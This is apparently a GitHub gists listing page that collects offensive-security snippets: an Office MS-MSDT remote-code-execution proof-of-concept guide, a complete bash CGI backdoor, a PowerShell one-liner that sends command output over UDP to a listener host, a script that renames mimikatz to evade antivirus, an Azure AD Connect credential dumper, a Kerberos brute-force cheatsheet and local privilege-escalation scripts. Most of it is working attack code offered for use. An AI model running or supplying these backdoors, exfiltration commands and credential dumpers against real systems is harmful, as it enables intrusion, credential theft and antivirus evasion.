Skip to content

Instantly share code, notes, and snippets.

View manantsoar's full-sized avatar

Manantsoa RAKOTONDRAZAKA manantsoar

27 followers · 77 following
View GitHub Profile
@tothi
tothi / ms-msdt.MD
Last active June 16, 2025 21:37
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@tothi
tothi / usbgadget_razer.sh
Created August 22, 2021 09:52
Razer USB gadget on Android for Local Privilege Escalation on Windows
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#
# the script was developed & tested on Android LineageOS 18.1
@MarkBaggett
MarkBaggett / gist:38dcff6a0975f148aa858e924d64c492
Created November 14, 2020 18:22
http.server cgi backdoor
cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi
@gwillcox-r7
gwillcox-r7 / DefenderArbitraryFileDelete.ps1
Created July 13, 2020 20:20
Windows Defender CVE-2020-1170 LPE Work Archive
# Taken from https://github.com/itm4n/CVEs/blob/master/CVE-2020-1170/DefenderArbitraryFileDelete.ps1 with minor modifications made where needed for Metasploit.
# All credits go to @itm4n for this PowerShell script!
# Testing
# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ZZ_SANDBOX\WER'"
# Real
# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ProgramData\Microsoft\Windows\WER'
$JobCode = {
function DoMpCmdRunLogFileWriteTriggerJob {
@ignis-sec
ignis-sec / powershell-udp-rce-output.txt
Created July 11, 2020 19:51
powershell command to return executed command output from 53/udp.
# On your host:
# $ nc -lnvup 53
# Replace <HOSTIP> with ip of the listening machine
powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse(\"<HOSTIP>\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));"
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / mimikatz_obfuscator.sh
Last active September 18, 2024 23:36 — forked from imaibou/mimikatz_obfuscator.sh
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/candycrush
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
@xpn
xpn / azuread_decrypt_msol_v2.ps1
Last active July 30, 2025 13:07
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"
try {
$client.Open()
} catch {
Write-Host "[!] Could not connect to localdb..."
return
@hyonschu
hyonschu / deleteDiscordMessages.js
Created July 11, 2019 19:36 — forked from victornpb/deleteDiscordMessages.js
Delete all your messages from DM or Channel in Discord
//Paste this function in DevTools console inside Discord
/**
* Delete all messages in a Discord channel or DM
* @param {string} authToken Your authorization token
* @param {string} authorId Author of the messages you want to delete
* @param {string} channelId Channel were the messages are located
* @param {string} afterMessageId Only delete messages after this, leave blank do delete all
* @author Victornpb <https://www.github.com/victornpb>
* @see https://gist.github.com/victornpb/135f5b346dea4decfc8f63ad7d9cc182
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@victornpb
victornpb / deleteDiscordMessages.js
Last active November 4, 2025 20:53
Delete all your messages from DM or Channel in Discord
/*
This file is now hosted here:
https://github.com/victornpb/undiscord
*/